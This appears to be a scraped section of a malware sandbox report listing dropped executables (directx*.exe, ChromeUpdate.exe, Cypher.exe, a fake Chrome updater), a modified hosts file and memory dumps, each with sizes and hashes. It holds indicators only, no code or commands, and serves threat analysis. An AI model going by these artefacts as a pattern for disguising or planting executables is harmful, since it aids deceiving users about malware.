27570a564eb0a836e5ec6b9dc8fe941d3c3f98238b8e4a1c816d076ea3dc1f67

SHA512
c1120e2b55a753187ebedd6022a32fd6aea9b41536da5b1670da18402fd6c1b747fc1e4e051e1edf13f61e391ad38183f3a9f0431ca36a6e2754f1230126ae2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxERR.exe

Filesize
277KB

MD5
42b2f41288903b76cdcd4f585e0e35f6

SHA1
d33b5b2b66329c117c307a6208c13ec3745cd662

SHA256
27570a564eb0a836e5ec6b9dc8fe941d3c3f98238b8e4a1c816d076ea3dc1f67

SHA512
c1120e2b55a753187ebedd6022a32fd6aea9b41536da5b1670da18402fd6c1b747fc1e4e051e1edf13f61e391ad38183f3a9f0431ca36a6e2754f1230126ae2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxMer.exe

Filesize
111KB

MD5
dab5342d0d566bc7d80e1cc11459912e

SHA1
7cd1a45da9458278571b13f08b28f607093e1225

SHA256
fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

SHA512
0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxMer.exe

Filesize
111KB

MD5
dab5342d0d566bc7d80e1cc11459912e

SHA1
7cd1a45da9458278571b13f08b28f607093e1225

SHA256
fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

SHA512
0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxUp.exe

Filesize
275KB

MD5
ff678c98945b8e1dfd7c84220ff47c84

SHA1
f7d26121e132d81d5f1a12f175ced8a43ec330cd

SHA256
71d49cfce7fdbc7f1d16b906bb3c8534fea6c490590628137c4d7e42046733f2

SHA512
175bee2c1c39d6633095f527578601f361c2de5db368bd4798ad06000bb69ed41930da6e4c7688bfff2277d7c3887b88711a084bafec9aa96585ca0536bd04fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxUp.exe

Filesize
275KB

MD5
ff678c98945b8e1dfd7c84220ff47c84

SHA1
f7d26121e132d81d5f1a12f175ced8a43ec330cd

SHA256
71d49cfce7fdbc7f1d16b906bb3c8534fea6c490590628137c4d7e42046733f2

SHA512
175bee2c1c39d6633095f527578601f361c2de5db368bd4798ad06000bb69ed41930da6e4c7688bfff2277d7c3887b88711a084bafec9aa96585ca0536bd04fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxc.exe

Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxc.exe

Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxw.exe

Filesize
8.4MB

MD5
fcc4014be0904e1cfa6939912db2a1b0

SHA1
224947f2dc32e111bcd74a7eb4655f512c52f906

SHA256
a6f580ad9b771d64c018acc1c804e68089d33eb394ff06adb1df59e8f33ed7b1

SHA512
a3fda3c8257f466e47d3be243dae3529207f77e4e28a4ee3d33c74072646305a8202f6130b96a1f235506cf27b33e0922c8d385a040bcbe1b389de46fd9ac685

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxw.exe

Filesize
8.4MB

MD5
fcc4014be0904e1cfa6939912db2a1b0

SHA1
224947f2dc32e111bcd74a7eb4655f512c52f906

SHA256
a6f580ad9b771d64c018acc1c804e68089d33eb394ff06adb1df59e8f33ed7b1

SHA512
a3fda3c8257f466e47d3be243dae3529207f77e4e28a4ee3d33c74072646305a8202f6130b96a1f235506cf27b33e0922c8d385a040bcbe1b389de46fd9ac685

Download Submit
C:\Users\Admin\AppData\Local\Temp\vsdir.exe

Filesize
275KB

MD5
8cfab25b120e5e4e990382c01a43debd

SHA1
e4489fa4ea392827129d53da90dd2434f2117f2e

SHA256
ec3ee2972f9988a438cf265c60ee86d4d59571306b86554bca11cd31c14abe56

SHA512
61099e61cf66a991137db126d8d1fd096ab585f6013162d73a5b76cf2bfbb64b1a4bc390ca606d8f6e5a32882267ce429b533881ab17826aa3e662a64cb4c599

Download Submit
C:\Users\Admin\AppData\Local\Temp\vsdir.exe

Filesize
275KB

MD5
8cfab25b120e5e4e990382c01a43debd

SHA1
e4489fa4ea392827129d53da90dd2434f2117f2e

SHA256
ec3ee2972f9988a438cf265c60ee86d4d59571306b86554bca11cd31c14abe56

SHA512
61099e61cf66a991137db126d8d1fd096ab585f6013162d73a5b76cf2bfbb64b1a4bc390ca606d8f6e5a32882267ce429b533881ab17826aa3e662a64cb4c599

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
627df3cf15f98f30924fad6a9116fd2b

SHA1
feb62197e6cce0d21bb4dc8a2dfe15514312531e

SHA256
e402a0069deaae250074cdb3f3720daf6d69fa318df8b237318d6a8b40bb9af2

SHA512
c55583b89c37cf24247c422aed3934b22a3d3679177c6e85a06477bab78b4ee761692972665af56777b583e2adb60f9c60b233782cd65969845149a30e73c78d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
627df3cf15f98f30924fad6a9116fd2b

SHA1
feb62197e6cce0d21bb4dc8a2dfe15514312531e

SHA256
e402a0069deaae250074cdb3f3720daf6d69fa318df8b237318d6a8b40bb9af2

SHA512
c55583b89c37cf24247c422aed3934b22a3d3679177c6e85a06477bab78b4ee761692972665af56777b583e2adb60f9c60b233782cd65969845149a30e73c78d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C8V0C7AAB6PA5YRHW3HI.temp

Filesize
7KB

MD5
0072b43cd985fc434ae6f384534f2907

SHA1
8e40f0bbcd7a239ee0b6ae1a6d2b8f48a11039a4

SHA256
ab5f719de89793de7e21891f96743082146219a003375e6c56335de1edf84b89

SHA512
f90a3c6547d3bcfccb2fc9784658b5537b3c363825bc550ba98ff2908c7ba3a3cee92f37ef8bd09854366869f72b001059d97d8c6f2a9014fdd78c0bdb82dee9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GSUV31VJRVMNXY9G0WXP.temp

Filesize
7KB

MD5
868daf7861935a46e1eb922d2cebc6fc

SHA1
c020f09dd7567b06bf0cea8915c215004da5de83

SHA256
5270f1f295ff0cdc819f9182f0c4b2b789d3b06803ff5fd2ab96c3af550225d9

SHA512
d412080d462a9085cf073b532b446abf82b1885300a139925b88918001d8d229dc7803199148543fe6612690cc24cf48573220d34d9f256531d03ae8d02ed02d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
8f2e60d0d7b2e91935604e36fea9413e

SHA1
fa037ae9d9ffa2c84ac8012a125268a641db51cd

SHA256
9893a9299a5b9a23e8611ec50dd3a3a36ede315c7b1e48be67aa428229246fbf

SHA512
ec559ab2aea0c9d3111b73e0df029f7ec8fbeda1a00946758e45abebdc56da85210f5d6ce3ad4f3f60a4dab335cbc6d0203a9fdf2edd7c4320ea874b596721ac

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
dc01102a37799ce91b28a45472a06417

SHA1
febcc8d0b5022298dd7ea3612bac922db5558601

SHA256
c774432e7cc1e7b941683a7722eba85b7545063fb49e4bff15d4d19843a89da8

SHA512
7e41592099ef324606edc76e9a41edc1a7fa5bea6b35c2e4a2558907bd050c2a980d6a8e65ac2dcead952eaafb8424b4421884d58c1b994fba7cd4b415347b8e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
dc01102a37799ce91b28a45472a06417

SHA1
febcc8d0b5022298dd7ea3612bac922db5558601

SHA256
c774432e7cc1e7b941683a7722eba85b7545063fb49e4bff15d4d19843a89da8

SHA512
7e41592099ef324606edc76e9a41edc1a7fa5bea6b35c2e4a2558907bd050c2a980d6a8e65ac2dcead952eaafb8424b4421884d58c1b994fba7cd4b415347b8e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
7702f3272e82ce6f76741edacef53eec

SHA1
39e6d6de82fff7cdb8bfd1fc1f515511c26f50df

SHA256
2f7ad27dadc0d255256364448c4e99aca9d455fe0046211482511167161188d4

SHA512
e7a3c1aedd2493aae5a14315248ef46ce5de8f356263532449a3e9eebb8babd97758783711af5fd1f5105e00d06b3933cdbeff43014cf058f581dc5057626c04

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
0072b43cd985fc434ae6f384534f2907

SHA1
8e40f0bbcd7a239ee0b6ae1a6d2b8f48a11039a4

SHA256
ab5f719de89793de7e21891f96743082146219a003375e6c56335de1edf84b89

SHA512
f90a3c6547d3bcfccb2fc9784658b5537b3c363825bc550ba98ff2908c7ba3a3cee92f37ef8bd09854366869f72b001059d97d8c6f2a9014fdd78c0bdb82dee9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
0072b43cd985fc434ae6f384534f2907

SHA1
8e40f0bbcd7a239ee0b6ae1a6d2b8f48a11039a4

SHA256
ab5f719de89793de7e21891f96743082146219a003375e6c56335de1edf84b89

SHA512
f90a3c6547d3bcfccb2fc9784658b5537b3c363825bc550ba98ff2908c7ba3a3cee92f37ef8bd09854366869f72b001059d97d8c6f2a9014fdd78c0bdb82dee9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
0072b43cd985fc434ae6f384534f2907

SHA1
8e40f0bbcd7a239ee0b6ae1a6d2b8f48a11039a4

SHA256
ab5f719de89793de7e21891f96743082146219a003375e6c56335de1edf84b89

SHA512
f90a3c6547d3bcfccb2fc9784658b5537b3c363825bc550ba98ff2908c7ba3a3cee92f37ef8bd09854366869f72b001059d97d8c6f2a9014fdd78c0bdb82dee9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
8f2e60d0d7b2e91935604e36fea9413e

SHA1
fa037ae9d9ffa2c84ac8012a125268a641db51cd

SHA256
9893a9299a5b9a23e8611ec50dd3a3a36ede315c7b1e48be67aa428229246fbf

SHA512
ec559ab2aea0c9d3111b73e0df029f7ec8fbeda1a00946758e45abebdc56da85210f5d6ce3ad4f3f60a4dab335cbc6d0203a9fdf2edd7c4320ea874b596721ac

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
8f2e60d0d7b2e91935604e36fea9413e

SHA1
fa037ae9d9ffa2c84ac8012a125268a641db51cd

SHA256
9893a9299a5b9a23e8611ec50dd3a3a36ede315c7b1e48be67aa428229246fbf

SHA512
ec559ab2aea0c9d3111b73e0df029f7ec8fbeda1a00946758e45abebdc56da85210f5d6ce3ad4f3f60a4dab335cbc6d0203a9fdf2edd7c4320ea874b596721ac

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
8f2e60d0d7b2e91935604e36fea9413e

SHA1
fa037ae9d9ffa2c84ac8012a125268a641db51cd

SHA256
9893a9299a5b9a23e8611ec50dd3a3a36ede315c7b1e48be67aa428229246fbf

SHA512
ec559ab2aea0c9d3111b73e0df029f7ec8fbeda1a00946758e45abebdc56da85210f5d6ce3ad4f3f60a4dab335cbc6d0203a9fdf2edd7c4320ea874b596721ac

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
8f2e60d0d7b2e91935604e36fea9413e

SHA1
fa037ae9d9ffa2c84ac8012a125268a641db51cd

SHA256
9893a9299a5b9a23e8611ec50dd3a3a36ede315c7b1e48be67aa428229246fbf

SHA512
ec559ab2aea0c9d3111b73e0df029f7ec8fbeda1a00946758e45abebdc56da85210f5d6ce3ad4f3f60a4dab335cbc6d0203a9fdf2edd7c4320ea874b596721ac

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
dc01102a37799ce91b28a45472a06417

SHA1
febcc8d0b5022298dd7ea3612bac922db5558601

SHA256
c774432e7cc1e7b941683a7722eba85b7545063fb49e4bff15d4d19843a89da8

SHA512
7e41592099ef324606edc76e9a41edc1a7fa5bea6b35c2e4a2558907bd050c2a980d6a8e65ac2dcead952eaafb8424b4421884d58c1b994fba7cd4b415347b8e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
dc01102a37799ce91b28a45472a06417

SHA1
febcc8d0b5022298dd7ea3612bac922db5558601

SHA256
c774432e7cc1e7b941683a7722eba85b7545063fb49e4bff15d4d19843a89da8

SHA512
7e41592099ef324606edc76e9a41edc1a7fa5bea6b35c2e4a2558907bd050c2a980d6a8e65ac2dcead952eaafb8424b4421884d58c1b994fba7cd4b415347b8e

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
2b19df2da3af86adf584efbddd0d31c0

SHA1
f1738910789e169213611c033d83bc9577373686

SHA256
58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd

SHA512
4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Program Files\Google\Chrome\updater.exe

Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe

Filesize
960KB

MD5
367dd476c0574f68f53020529c1b2623

SHA1
747d93ffd8afbe48203ac7b19b5c087072be6670

SHA256
efb4ed64cbd3ed0031b494d87402520f4401c47684539bb4a09fb8e02024085f

SHA512
c4e13af20acab668b84d0d22fd757fd56f2202555495dd038af8bce6f4630bcce3b834437214013e7710de28c8642d79b1315c4e33481bc71b4900972428f05d

Download Submit
\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe

Filesize
960KB

MD5
367dd476c0574f68f53020529c1b2623

SHA1
747d93ffd8afbe48203ac7b19b5c087072be6670

SHA256
efb4ed64cbd3ed0031b494d87402520f4401c47684539bb4a09fb8e02024085f

SHA512
c4e13af20acab668b84d0d22fd757fd56f2202555495dd038af8bce6f4630bcce3b834437214013e7710de28c8642d79b1315c4e33481bc71b4900972428f05d

Download Submit
\Users\Admin\AppData\Local\Temp\Cypher.exe

Filesize
112KB

MD5
279819a8325c9ed6306dc236ac0c78e1

SHA1
84506ecb5534e132a4aea88c4a3a7504711d8733

SHA256
c2520b13d81029f5ce2318e636245c431dbfd8e633e2960ef2da30907c36f3ab

SHA512
23e68fa2fd57b980f7d5aadef9c3ac9e8c0ffa34f8c4c55f97d33d789c936dfce434701aa83c6f380976d78bd61d3be0584eeb4f633f7c85f80a401db2212f45

Download Submit
\Users\Admin\AppData\Local\Temp\directx.exe

Filesize
275KB

MD5
9cfc6a421eb592f551d6950493c6df4c

SHA1
d46b29bacfddd26d80d64d6e66bd9488d91a22d7

SHA256
5d95da32a776780b6e8ffb4b4cdc8bcc1a296357a7f614b9e55a300ce5808a82

SHA512
64e1c4faa7ae1126e733ee4849e2e68ea5aec03325bd2ca739524a5f53a5b532bf570a2b7b098f78e21fd2673a09d33340c97a947191ea3f01f16bf91350b078

Download Submit
\Users\Admin\AppData\Local\Temp\directx.exe

Filesize
275KB

MD5
9cfc6a421eb592f551d6950493c6df4c

SHA1
d46b29bacfddd26d80d64d6e66bd9488d91a22d7

SHA256
5d95da32a776780b6e8ffb4b4cdc8bcc1a296357a7f614b9e55a300ce5808a82

SHA512
64e1c4faa7ae1126e733ee4849e2e68ea5aec03325bd2ca739524a5f53a5b532bf570a2b7b098f78e21fd2673a09d33340c97a947191ea3f01f16bf91350b078

Download Submit
\Users\Admin\AppData\Local\Temp\directxCrack.exe

Filesize
95KB

MD5
af8a3a1cb685f9e1fdcc970bd4ca420f

SHA1
9342d6f660df293516c2932c905fe4411474e321

SHA256
39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

SHA512
04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

Download Submit
\Users\Admin\AppData\Local\Temp\directxCrack.exe

Filesize
95KB

MD5
af8a3a1cb685f9e1fdcc970bd4ca420f

SHA1
9342d6f660df293516c2932c905fe4411474e321

SHA256
39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

SHA512
04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

Download Submit
\Users\Admin\AppData\Local\Temp\directxERR.exe

Filesize
277KB

MD5
42b2f41288903b76cdcd4f585e0e35f6

SHA1
d33b5b2b66329c117c307a6208c13ec3745cd662

SHA256
27570a564eb0a836e5ec6b9dc8fe941d3c3f98238b8e4a1c816d076ea3dc1f67

SHA512
c1120e2b55a753187ebedd6022a32fd6aea9b41536da5b1670da18402fd6c1b747fc1e4e051e1edf13f61e391ad38183f3a9f0431ca36a6e2754f1230126ae2f

Download Submit
\Users\Admin\AppData\Local\Temp\directxERR.exe

Filesize
277KB

MD5
42b2f41288903b76cdcd4f585e0e35f6

SHA1
d33b5b2b66329c117c307a6208c13ec3745cd662

SHA256
27570a564eb0a836e5ec6b9dc8fe941d3c3f98238b8e4a1c816d076ea3dc1f67

SHA512
c1120e2b55a753187ebedd6022a32fd6aea9b41536da5b1670da18402fd6c1b747fc1e4e051e1edf13f61e391ad38183f3a9f0431ca36a6e2754f1230126ae2f

Download Submit
\Users\Admin\AppData\Local\Temp\directxMer.exe

Filesize
111KB

MD5
dab5342d0d566bc7d80e1cc11459912e

SHA1
7cd1a45da9458278571b13f08b28f607093e1225

SHA256
fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

SHA512
0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

Download Submit
\Users\Admin\AppData\Local\Temp\directxUp.exe

Filesize
275KB

MD5
ff678c98945b8e1dfd7c84220ff47c84

SHA1
f7d26121e132d81d5f1a12f175ced8a43ec330cd

SHA256
71d49cfce7fdbc7f1d16b906bb3c8534fea6c490590628137c4d7e42046733f2

SHA512
175bee2c1c39d6633095f527578601f361c2de5db368bd4798ad06000bb69ed41930da6e4c7688bfff2277d7c3887b88711a084bafec9aa96585ca0536bd04fa

Download Submit
\Users\Admin\AppData\Local\Temp\directxUp.exe

Filesize
275KB

MD5
ff678c98945b8e1dfd7c84220ff47c84

SHA1
f7d26121e132d81d5f1a12f175ced8a43ec330cd

SHA256
71d49cfce7fdbc7f1d16b906bb3c8534fea6c490590628137c4d7e42046733f2

SHA512
175bee2c1c39d6633095f527578601f361c2de5db368bd4798ad06000bb69ed41930da6e4c7688bfff2277d7c3887b88711a084bafec9aa96585ca0536bd04fa

Download Submit
\Users\Admin\AppData\Local\Temp\directxc.exe

Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
\Users\Admin\AppData\Local\Temp\directxw.exe

Filesize
8.4MB

MD5
fcc4014be0904e1cfa6939912db2a1b0

SHA1
224947f2dc32e111bcd74a7eb4655f512c52f906

SHA256
a6f580ad9b771d64c018acc1c804e68089d33eb394ff06adb1df59e8f33ed7b1

SHA512
a3fda3c8257f466e47d3be243dae3529207f77e4e28a4ee3d33c74072646305a8202f6130b96a1f235506cf27b33e0922c8d385a040bcbe1b389de46fd9ac685

Download Submit
\Users\Admin\AppData\Local\Temp\vsdir.exe

Filesize
275KB

MD5
8cfab25b120e5e4e990382c01a43debd

SHA1
e4489fa4ea392827129d53da90dd2434f2117f2e

SHA256
ec3ee2972f9988a438cf265c60ee86d4d59571306b86554bca11cd31c14abe56

SHA512
61099e61cf66a991137db126d8d1fd096ab585f6013162d73a5b76cf2bfbb64b1a4bc390ca606d8f6e5a32882267ce429b533881ab17826aa3e662a64cb4c599

Download Submit
\Users\Admin\AppData\Local\Temp\vsdir.exe

Filesize
275KB

MD5
8cfab25b120e5e4e990382c01a43debd

SHA1
e4489fa4ea392827129d53da90dd2434f2117f2e

SHA256
ec3ee2972f9988a438cf265c60ee86d4d59571306b86554bca11cd31c14abe56

SHA512
61099e61cf66a991137db126d8d1fd096ab585f6013162d73a5b76cf2bfbb64b1a4bc390ca606d8f6e5a32882267ce429b533881ab17826aa3e662a64cb4c599

Download Submit
memory/560-251-0x0000000000400000-0x000000000132A000-memory.dmp

Filesize
15.2MB

Download
memory/560-194-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/560-184-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/560-185-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/560-217-0x00000000002A0000-0x00000000002A1000-memory.dmp

Filesize
4KB

Download
memory/560-187-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/560-189-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/560-192-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/560-183-0x0000000000400000-0x000000000132A000-memory.dmp

Filesize
15.2MB

Download
memory/560-181-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/560-178-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/560-216-0x0000000077C60000-0x0000000077C61000-memory.dmp

Filesize
4KB

Download
memory/568-140-0x00000000003D0000-0x0000000000417000-memory.dmp

Filesize
284KB

Download
memory/568-168-0x00000000003D0000-0x0000000000417000-memory.dmp

Filesize
284KB

Download
memory/600-135-0x0000000000100000-0x0000000000147000-memory.dmp

Filesize
284KB

Download
memory/600-105-0x0000000000100000-0x0000000000147000-memory.dmp

Filesize
284KB

Download
memory/1496-257-0x0000000001FB0000-0x0000000002030000-memory.dmp

Filesize
512KB

Download
memory/1496-256-0x0000000001FB0000-0x0000000002030000-memory.dmp

Filesize
512KB

Download
memory/1496-255-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

Filesize
9.6MB

Download
memory/1496-252-0x0000000001FB0000-0x0000000002030000-memory.dmp

Filesize
512KB

Download
memory/1496-250-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

Filesize
9.6MB

Download
memory/1576-18-0x0000000004AD0000-0x0000000004E54000-memory.dmp

Filesize
3.5MB

Download
memory/1576-0-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1576-6-0x0000000000400000-0x000000000273B000-memory.dmp

Filesize
35.2MB

Download
memory/1576-124-0x0000000004AD0000-0x0000000004E54000-memory.dmp

Filesize
3.5MB

Download
memory/1576-8-0x0000000077C60000-0x0000000077C61000-memory.dmp

Filesize
4KB

Download
memory/1576-2-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1576-134-0x0000000000400000-0x000000000273B000-memory.dmp

Filesize
35.2MB

Download
memory/1576-4-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1576-5-0x0000000000400000-0x000000000273B000-memory.dmp

Filesize
35.2MB

Download
memory/1576-20-0x0000000004AD0000-0x0000000004E54000-memory.dmp

Filesize
3.5MB

Download
memory/2016-233-0x0000000074330000-0x0000000074A1E000-memory.dmp

Filesize
6.9MB

Download
memory/2016-96-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2016-109-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2016-97-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2016-130-0x0000000074330000-0x0000000074A1E000-memory.dmp

Filesize
6.9MB

Download
memory/2016-112-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2084-176-0x0000000074330000-0x0000000074A1E000-memory.dmp

Filesize
6.9MB

Download
memory/2084-62-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/2084-68-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

